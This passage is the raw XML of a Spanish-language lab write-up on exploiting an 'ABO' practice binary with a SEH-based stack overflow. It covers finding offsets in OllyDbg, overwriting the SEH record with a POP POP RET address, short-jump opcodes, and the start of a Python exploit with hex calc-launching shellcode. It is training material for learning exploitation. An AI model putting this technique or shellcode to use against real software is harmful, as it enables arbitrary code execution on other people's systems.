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Resuelto el </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="0000ee"/>
            <w:u w:val="single"/>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ABO1_VS_2017</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pasamos al sigueinte ABO que es el nivel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3929063" cy="2285405"/>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29063" cy="228540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Aquí estamos en la función </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">main</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, vemos un </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gets</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, pero al final no vemos ningún </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ret</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> y en su lugar hay una función que se llama </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">esta función es la que se va a encargar de liberar la memoria que se ha usado y cerrar el programa, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">¿será por eso que no vemos ningún </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mov esp, ebp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">al final de esta rutina?¿</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2052638" cy="641449"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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052638" cy="64144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En fin, en este caso se me ocurre reventar el stack con </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">para provocar un error y que se encargue el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">manejador de excepciones</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> del mismo.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t xml:space="preserve">Con el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IDA </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no se como ver esto, asi que me ayudaré del </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ollydbg</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Simplemente ponemos un </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> después del </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gets</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2781300" cy="400050"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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78130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 esta forma en la </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pila</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tendremos la </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cadena </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">que le mandamos, muchas Aes…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Y si bajamos hasta el comienzo sabremos el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">size</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> que necesitamos para provocar un crash.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1543050" cy="74295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54305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t xml:space="preserve">En este caso son </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x4D4 + 4 + 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Podemos ver a donde saltara para tratar el crash, vamos a la ventana de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">seh</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2190750" cy="476250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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1907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40B170</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> manejara el crash, en el stack lo vemos aquí en la posición </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x43C</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3000375" cy="400050"/>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00037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Cuando lo llenemos de Aes, esto se va a sobreescribir, asi que en nuestro </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">deberíamos poner una dirección a la cual queremos saltar, en vez de 4 Aes….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Muy bien provocamos un crash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4543425" cy="228600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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54342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t xml:space="preserve">Vemos que el registro </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EDI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> queda apuntando al inicio de nuestro </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload.</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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3390900" cy="10668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3909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Entonces vamos a reemplazar la dirección del </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">seh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> por uno que apunte a un </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JMP EDI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> o similar.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t xml:space="preserve">Bueno encontre muchos </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CALL EDI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">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2119313" cy="1512158"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="114300"/>
            <wp:docPr id="6"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2119313" cy="151215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2238375</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>200025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2900363" cy="1683427"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="114300" distT="114300"/>
            <wp:docPr id="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900363" cy="1683427"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bueno, aqui lo hice crashear y todo bien, pero el hijo de mil instalo otra vez el mismo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SEH</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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2486025" cy="914400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16"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248602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Piuto</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">!-.- Bueno no pasa nada, justo el que está ahí abajo es el que controlamos nosotros :P, ahora en vez de un </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">call edi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, tendremos que buscar un </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pop pop  ret, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">porque el registro </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">edi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ya no apunta al </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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Tenemos que encontrar un </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP POP RET, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">porque en la pila nos quedan dos valores basuras, y en la tercera ubicación está la dirección donde se encuentra el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">próximo seh </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3667125" cy="704850"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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66712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Si le hacemos un follow veremos que nos lleva a donde está nuestro </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload</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3686175" cy="1133475"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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68617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t xml:space="preserve">Acá encontramos en </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP POP RET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2657475" cy="476250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10"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265747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t xml:space="preserve">Al ejecutarse el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RET</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vamos a saltar al </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> justamente encima de esos </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x41414141</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, son 4 bytes que controlamos, como dijimos esta parte no es más que el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pointer to next SEH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> y el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SEH</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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="762000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13"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7312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En el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SEH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tenemos el puntero al </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP POP RET, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">así que debemos evitar de pisarlo, entonces para evitar eso tenemos que poner los </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">opcodes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EB06 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">que es un salto reemplazando los </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x41414141, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nos va a quedar así:</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4248150" cy="1228725"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4"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424815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Okey, me he dado cuenta que el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> no nos va a entrar ahí abajo :/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">así que voy a poner otro que vaya arriba, por lo cual deberemos saltar para arriba al comienzo del payload.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Estos son los opcodes para el salto </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3057525" cy="276225"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11"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305752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Okey, funciona, pero el muy piuto me abre miles de calculadoras -.- , así lo que intente fue ponerle un salto a la función </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">_exit</w:t>
      </w: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t xml:space="preserve">Eh visto que la </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">que ejecuta la calculadora, la segunda mitad esta al pedo, y además me provoca un error, que era lo que causaba que se abrieran miles de calculadoras. La solución fue solo usar la primera mitad, que es la que ejecuta la calculadora, y luego le metí el salto al </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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sys</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binascii</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">from subprocess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Popen, PIPE</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">winexec_calc_shellcode = b</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'31c94931d2e347526863616c6389e65256648b72308b760c8b760cad8b308b7e188b5f3c8b5c1f788b741f2001fe8b4c1f2401f90fb72c5142ad813c0757696e4575f18b741f1c01fe033caeffd7'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">winexec_calc_shellcode = binascii.unhexlify(winexec_calc_shellcode)</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">size_crash = </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="d36363"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0xE6</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">size_to_next_seh = </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
